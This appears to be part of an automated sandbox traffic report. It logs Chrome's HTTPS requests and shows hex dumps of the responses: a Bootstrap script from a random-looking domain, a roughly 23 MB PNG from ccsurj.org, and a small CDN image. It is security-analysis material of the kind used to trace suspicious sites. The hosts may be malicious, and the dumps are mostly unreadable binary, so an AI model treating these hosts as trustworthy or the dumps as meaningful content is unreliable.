                                          2025-01-12 00:17:04 UTC16384INData Raw: bd b6 55 44 9a e2 ac 9a d4 93 a8 8a 81 b7 12 13 d1 c3 c3 83 aa 32 10 9c 73 4c 12 63 9c a7 39 ce b5 33 bb 91 bc 77 a8 2a c0 40 52 21 2a 62 4c 65 4a 94 91 77 bb fe 70 98 63 22 c5 8f 3f ff 83 fa 8a 3a 74 94 a1 80 33 d0 5a 5d 71 b2 c4 ce 87 1c e9 b1 7d af 15 92 5d 52 06 0c b7 0c 1a 55 1d 86 0e d8 b1 e7 4c a5 d6 21 23 4e 55 bd cc 93 83 2e e6 45 6a 33 d5 55 45 35 ce 8b f9 a8 92 8a 23 06 53 5a e2 34 5f 58 85 6b 05 41 94 32 0d 04 24 21 ef ba 6e 18 86 c1 31 bb 99 d4 0b 00 e7 ef e0 48 dd ab 0f 64 ad a4 3d c5 5a b9 c7 25 16 e5 7c 99 9d ff 30 f4 21 78 02 d6 7c 04 65 f2 c4 42 f0 c4 8b a4 43 d7 4f 71 39 f6 c3 65 9e 86 d0 2d 92 1e 1e 9e a0 20 90 b1 e0 15 3f b9 86 ce da 9f 3f fb d9 cf 7e f2 93 9f fc e9 9f fe a9 a5 b9 db a1 31 1d bb ce ec 24 20 6a b3 3d e3 b2 b4 96 b3 62
                                          Data Ascii: UD2sLc93w*@R!*bLeJwpc"?:t3Z]q}]RUL!#NU.Ej3UE5#SZ4_XkA2$!n1Hd=Z%|0!x|eBCOq9e- ??~1$ j=b
                                          2025-01-12 00:17:04 UTC16384INData Raw: 81 1c 23 93 44 2d 22 59 8a d3 20 a0 08 64 81 81 b9 12 63 ad 7b 80 93 9c 57 23 35 61 63 1d b2 bd 4d 55 09 d8 b9 e0 5c b2 9d 75 1c 47 53 71 4a 29 db ed 56 44 8c 16 cb 40 6e 86 c2 55 55 4b b7 5b af 2f 82 f3 39 e7 fd 70 38 0c c3 90 4b 97 32 22 02 b9 ed ee 90 c7 a1 0d 21 90 03 2a 9a 4b 01 99 86 71 e2 00 d5 e3 62 16 90 5c 8c 92 5c 4b 29 92 0a 28 22 ae da f5 28 90 14 63 12 74 08 05 32 a8 68 89 25 7b e2 58 14 50 c7 a2 5c 4a 52 dc b8 26 34 bd 02 9b e4 21 a2 94 95 44 44 4a ce 42 44 a5 08 11 94 02 f3 0c 0e ec 1b 15 4b 94 c7 b9 28 b1 53 d5 a6 e9 4a 29 73 e4 89 4c b9 b2 36 4f 89 1a 8c 5b 28 02 c0 9b 37 6f c6 71 dc 6c 36 57 57 2f 54 d5 16 8f 23 cc 39 02 61 e8 da ae 5f 67 19 b2 a8 8a 26 51 62 04 65 b5 3c 08 cb 49 55 02 80 82 98 81 56 fd aa bf b8 f2 f7 5b 24 f2 ec 55 b5
                                          Data Ascii: #D-"Y dc{W#5acMU\uGSqJ)VD@nUUK[/9p8K2"!*Kqb\\K)("(ct2h%{XP\JR&4!DDJBDK(SJ)sL6O[(7oql6WW/T#9a_g&Qbe<IUV[$U
                                          2025-01-12 00:17:04 UTC16384INData Raw: 63 b2 75 5d 8b f5 ef 7d f0 71 df 0d a5 1b 64 8a 70 13 22 18 8d 62 03 03 80 0b 8e 25 3b 42 6b f0 7c bd 22 eb 8c 71 15 12 00 0e fb fd b7 bf fd e6 ee ea 6a b3 58 02 c0 78 e8 1a ef f5 20 77 75 e3 8f 3c 3d 22 c2 b1 54 64 5d dd 60 61 34 68 bc 2b cc 05 e4 d9 93 a7 ff ec bf fc af 2e 9e 7d f0 dd f7 df 87 aa a9 9a 45 ce ec 82 1f ba 83 5a a5 47 5c 5c 06 00 e7 5c 5d d7 37 37 37 5d d7 4d 48 57 e6 9c 33 83 a0 35 39 67 91 62 91 48 eb 45 59 3c e1 cb ef 9e 1b 56 e7 56 50 4d 70 00 01 ea c7 38 6f 4d 7c 52 e0 77 ea ef a1 a2 de 59 00 d9 00 5a 41 c3 98 73 e1 22 ab 76 fd f4 e9 d3 7e 88 ed 72 cd 04 0c 53 b5 18 4f e5 9d 60 4d 05 40 d2 75 29 25 01 ab 4a 73 00 38 a4 84 39 4a 29 b1 8b fb db 9b ed cd 6d 4e a3 35 c4 29 22 f0 e9 ce a9 5d ea ba 0e 4f da bd f9 c8 39 e7 1c ea ba 1b c6 ba
                                          Data Ascii: cu]}qdp"b%;Bk|"qjXx wu<="Td]`a4h+.}EZG\\\]777]MHW359gbHEY<VVPMp8oM|RwYZAs"v~rSO`M@u)%Js89J)mN5)"]O9
                                          2025-01-12 00:17:04 UTC16384INData Raw: fa 8a 21 b5 7d 7f 38 82 51 25 5d 45 98 f6 82 fd e6 50 67 34 21 19 4e c6 a2 36 69 1b 90 88 d4 c2 29 56 76 19 9a 94 cf 45 4c 89 71 8e 6f 0d a9 f6 8a 11 58 a5 9f c9 39 87 10 8a c2 e3 37 df ae f2 a1 fb 67 77 ff 02 15 40 19 d5 13 53 1e 6b 7e 24 27 41 6f b5 3d 14 51 ab c5 df ab 89 e0 9c fd e4 a9 bb 1d bd 0b 6d bb 7c fb ed 77 93 41 02 cc 06 05 08 90 0d 19 c9 bc a9 e4 11 11 63 8c 67 67 55 97 cb 3f 7e fc 66 45 d4 1f de 52 00 30 13 f2 d4 f7 fd 7a b9 40 50 07 56 61 e1 ce b9 9c ee e3 db 9a cf aa 1b e2 eb 19 f1 60 ff 7e 98 eb c0 aa ea 9c 03 05 98 c4 54 b1 88 d5 9d f5 c1 83 07 e0 48 0c 9b c5 52 c5 04 8c c8 89 64 52 35 c9 21 84 fa a0 2b e4 a4 f1 cd d1 f2 e8 a5 ad d0 cc 04 24 2c da 9c c7 06 39 30 07 9b 88 24 86 ae 7f e1 94 b4 d6 89 27 86 c4 99 6a 14 01 66 95 7a 30 22 52
                                          Data Ascii: !}8Q%]EPg4!N6i)VvELqoX97gw@Sk~$'Ao=Qm|wAcggU?~fER0z@PVa`~THRdR5!+$,90$'jfz0"R


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          58192.168.2.449808122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:03 UTC537OUTGET /bootstrap.min.js HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://1k4ej4j1lxvjwz.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:04 UTC380INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:03 GMT
                                          Content-Type: application/javascript
                                          Content-Length: 60003
                                          Last-Modified: Tue, 26 Dec 2023 13:01:43 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "658aceb7-ea63"
                                          Expires: Sun, 12 Jan 2025 12:17:03 GMT
                                          Cache-Control: max-age=43200
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:04 UTC16004INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 35 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62
                                          Data Ascii: /*! * Bootstrap v4.5.2 (https://getbootstrap.com/) * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,e){"ob
                                          2025-01-12 00:17:04 UTC16384INData Raw: 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6f 2e 5f 63 6f 6e 66 69 67 2e 70 61 72 65 6e 74 3f 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 70 61 72 65 6e 74 22 29 3d 3d 3d 6f 2e 5f 63 6f 6e 66 69 67 2e 70 61 72 65 6e 74 3a 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 63 6f 6c 6c 61 70 73 65 22 29 7d 29 29 29 2e 6c 65 6e 67 74 68 26 26 28 6e 3d 6e 75 6c 6c 29 2c 21 28 6e 26 26 28 69 3d 65 28 6e 29 2e 6e 6f 74 28 74 68 69 73 2e 5f 73 65 6c 65 63 74 6f 72 29 2e 64 61 74 61 28 22 62 73 2e 63 6f 6c 6c 61 70 73 65 22 29 29 26 26 69 2e 5f 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 29 29 29 7b 76 61 72 20 73 3d 65 2e 45 76 65 6e 74 28 22 73 68 6f 77 2e 62 73 2e 63 6f 6c 6c 61 70 73 65 22 29 3b 69 66 28 65 28 74
                                          Data Ascii: n"string"==typeof o._config.parent?t.getAttribute("data-parent")===o._config.parent:t.classList.contains("collapse")}))).length&&(n=null),!(n&&(i=e(n).not(this._selector).data("bs.collapse"))&&i._isTransitioning))){var s=e.Event("show.bs.collapse");if(e(t
                                          2025-01-12 00:17:04 UTC16384INData Raw: 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 29 3b 65 28 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 29 2e 6f 6e 65 28 61 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 74 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 6f 29 7d 65 6c 73 65 20 69 66 28 21 74 68 69 73 2e 5f 69 73 53 68 6f 77 6e 26 26 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 29 7b 65 28 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 73 68 6f 77 22 29 3b 76 61 72 20 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 5f 72 65 6d 6f 76 65 42 61 63 6b 64 72 6f 70 28 29 2c 74 26 26 74 28 29 7d 3b 69 66 28 65 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43
                                          Data Ascii: sitionDurationFromElement(this._backdrop);e(this._backdrop).one(a.TRANSITION_END,t).emulateTransitionEnd(o)}else if(!this._isShown&&this._backdrop){e(this._backdrop).removeClass("show");var s=function(){n._removeBackdrop(),t&&t()};if(e(this._element).hasC
                                          2025-01-12 00:17:04 UTC11231INData Raw: 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 72 2e 69 73 57 69 74 68 43 6f 6e 74 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 54 69 74 6c 65 28 29 7c 7c 74 68 69 73 2e 5f 67 65 74 43 6f 6e 74 65 6e 74 28 29 7d 2c 72 2e 61 64 64 41 74 74 61 63 68 6d 65 6e 74 43 6c 61 73 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 28 74 68 69 73 2e 67 65 74 54 69 70 45 6c 65 6d 65 6e 74 28 29 29 2e 61 64 64 43 6c 61 73 73 28 22 62 73 2d 70 6f 70 6f 76 65 72 2d 22 2b 74 29 7d 2c 72 2e 67 65 74 54 69 70 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 74 69 70 3d 74 68 69 73 2e 74 69 70 7c 7c 65 28 74 68 69 73 2e 63 6f 6e 66 69 67 2e 74 65 6d 70 6c 61 74 65 29 5b 30 5d 2c 74 68 69 73 2e
                                          Data Ascii: ototype;return r.isWithContent=function(){return this.getTitle()||this._getContent()},r.addAttachmentClass=function(t){e(this.getTipElement()).addClass("bs-popover-"+t)},r.getTipElement=function(){return this.tip=this.tip||e(this.config.template)[0],this.


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          59192.168.2.449811154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:04 UTC637OUTGET /__local/F/3A/FA/D3291F0B28550FCE05C6FD5AA87_291DC08D_1634EF4.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:05 UTC307INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:04 GMT
                                          Content-Type: image/png
                                          Content-Length: 23285492
                                          Last-Modified: Fri, 10 Jan 2025 07:04:32 GMT
                                          Connection: close
                                          ETag: "6780c680-1634ef4"
                                          Expires: Tue, 11 Feb 2025 00:17:04 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:05 UTC16077INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0c 89 00 00 07 13 08 06 00 00 00 6b 64 82 a5 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 20 00 49 44 41 54 78 01 00 6f 96 90 69 01 2c 22 23 ff 01 ff fe 00 00 00 00 00 02 02 02 00 01 01 01 00 01 ff ff 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 ff ff ff 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 01 01 01 00 fe fe fd 00 01 01 01 00 01 01 01 00 00 00 00 00 01 01 01 00 ff ff ff 00 fe 01 00 00 0d
                                          Data Ascii: PNGIHDRkdpHYsttfx IDATxoi,"#
                                          2025-01-12 00:17:05 UTC16384INData Raw: ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 ff ff ff 00 01 01 01 00 00 00 00 00 00 00 00 00 ff ff ff 00 01 01 01 00 00 00 00 00 02 02 02 00 fe fe fe 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 00 00 00 00 01 01 01 00 00 01 01 00 ff ff ff 00 01 01 01 00 00 00 00 00 00 00 00 00 ff ff ff 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:05 UTC16384INData Raw: 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:05 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 01 01 01 00 ff ff ff 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ff 00 00 00 fc fd fd 00 f9 f9 fb 00 07 07 fe 00 01 01 ff 00 00 00 00 00 fd fd fd 00 03 03 03 00 06 06 06 00 f8 f8 f8 00 fd fe 00 00 00 00 00 00 02 01 01 00 ff ff ff 00 01 01 ff 00 00 00 fe 00 ff 01 01 00 00 01 01 00 01 00 02 00 fe fe fe 00 fa fa fa 00 ff ff ff 00 fe fe fe 00 02 02 02 00 ff ff ff 00 ff ff ff 00 00 00 fd 00 01 01 01 00 00 00 ff 00 ff ff ff 00 fd fd
                                          Data Ascii:
                                          2025-01-12 00:17:05 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 02 02 00 ff ff ff 00 ff 02 00 00 00 ff 00 00 ff ff ff 00 00 00 00 00 01 01 01 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 00 00 00 00 01 01 01 00 ff ff ff 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 fe fe fd 00 01 01 01 00 01 01 01 00 05 05 05 00 ff ff ff 00 01 01 01 00 fc 01 01 00 fb fb fb 00 fd fd fd 00 00 00 00 00 00 00 00 00 01 01 01 00 01 ff 00 00 ff ff ff 00 01 01 01 00 00 ff 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 ff 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:05 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 ff ff ff 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 01 01 01 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:05 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 01 01 01 00 ff 01 01 00 00 00 00 00 00 00 00 00 ff ff ff 00 fe 00 00 00 fe ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:05 UTC16384INData Raw: 00 00 00 03 03 03 00 03 03 03 00 02 02 02 00 00 00 00 00 ff ff ff 00 ff ff ff 00 ff fe ff 00 00 00 00 00 01 01 01 00 02 02 02 00 01 00 02 00 00 00 00 00 02 02 02 00 02 02 02 00 fc fc fc 00 fd fd fd 00 fd fd fd 00 fe fe fe 00 fe 00 ff 00 ff ff ff 00 ff ff ff 00 05 05 05 00 04 03 04 00 04 04 04 00 05 02 03 00 fd fd fd 00 fb fb fb 00 fe fe fe 00 00 00 00 00 00 00 00 00 fe ff fe 00 02 02 02 00 03 03 03 00 03 03 03 00 ff 01 00 00 fe fe fe 00 fe fe fe 00 fd fd fd 00 ff fd fe 00 ff ff ff 00 ff ff ff 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 01 01 01 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 fd fd fd 00 ff ff ff 00 fd fe fb 00 01 01 01 00 fe fe fe 00 00 00 00 00 01 01 02 00 00 00 00 00 02 02 02 00 03 04 02 00 fe fe 00 00 fc fc fc 00 00 01 03 00
                                          Data Ascii:
                                          2025-01-12 00:17:05 UTC16384INData Raw: 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:05 UTC16384INData Raw: 01 01 00 ff ff ff 00 ff ff ff 00 01 01 01 00 00 00 00 00 01 01 01 00 ff ff ff 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          60192.168.2.44981813.32.121.434435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:04 UTC596OUTGET /t010e288a56a0b005e9.png HTTP/1.1
                                          Host: p.ssl.qhimg.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:04 UTC632INHTTP/1.1 200 OK
                                          Content-Type: image/png
                                          Content-Length: 3294
                                          Connection: close
                                          Date: Fri, 13 Dec 2024 01:00:58 GMT
                                          Last-Modified: Mon, 23 Sep 2024 11:06:46 GMT
                                          xzp: orxleiwzhoemlml
                                          Expires: Thu, 13 Mar 2025 01:00:58 GMT
                                          Cache-Control: s-maxage=7776000, max-age=7776000
                                          Access-Control-Allow-Origin: *
                                          Timing-Allow-Origin: *
                                          XCS: HIT
                                          KCS-Via: MISS from w-fc01.lato;MISS from w-sc02.lyct
                                          Accept-Ranges: bytes
                                          X-Cache: Hit from cloudfront
                                          Via: 1.1 fd4a8fa7c304171992e7f22fc8894904.cloudfront.net (CloudFront)
                                          X-Amz-Cf-Pop: FRA60-P1
                                          X-Amz-Cf-Id: VTY63OJyBrCaqSrtiVRpBto8u-NT18zt48_NS8Vu0ZgNHnlKRo-xbg==
                                          Age: 2589366
                                          2025-01-12 00:17:04 UTC3198INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 64 00 00 00 16 08 06 00 00 01 41 0f 09 08 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 0c 95 49 44 41 54 68 05 ed 99 79 74 d4 d5 15 c7 7f bf c9 24 82 04 92 20 44 c1 80 0e a0 8d 52 14 4d 00 09 46 a3 d6 ca 62 ac a8 58 17 6c ab b2 b4 5a 41 ab a2 2c 6a 28 6a 2b 6e f4 58 ab 2c 8a 7b 8f 46 ad 25 a9 60 db 23 69 d9 44 08 c5 b2 88 ca a6 50 12 16 49 42 06 02 99 64 7e fd 7c 5f e6 0d 93 71 82 a9 f6 0f fe f0 9d f3 e6 de 77 b7 b7 dc fb ee 7b ef 37 8e 43 49 2f 19 fd b6 60 ab 8b 55 28 58 58 e4 6f 49 29 37 37 77 53 4e 4e 8e 27 7e 41 41 41 93 9c b7 b0 c0 ef cd 3c db 10 ad e2 c0 81 03 3b 5a 3c 2f 2f ef 24 e1 52 a4 ce 30 f4 b4 92 d1 9f 58 81 af 85 08 6f 94 50 da bc 51 cd 7a b1 8a 58 fd 38 62 bd 51 34 5f f5 8e
                                          Data Ascii: PNGIHDRdAgAMAaIDAThyt$ DRMFbXlZA,j(j+nX,{F%`#iDPIBd~|_qw{7CI/`U(XXoI)77wSNN'~AAA<;Z<//$R0XoPQzX8bQ4_
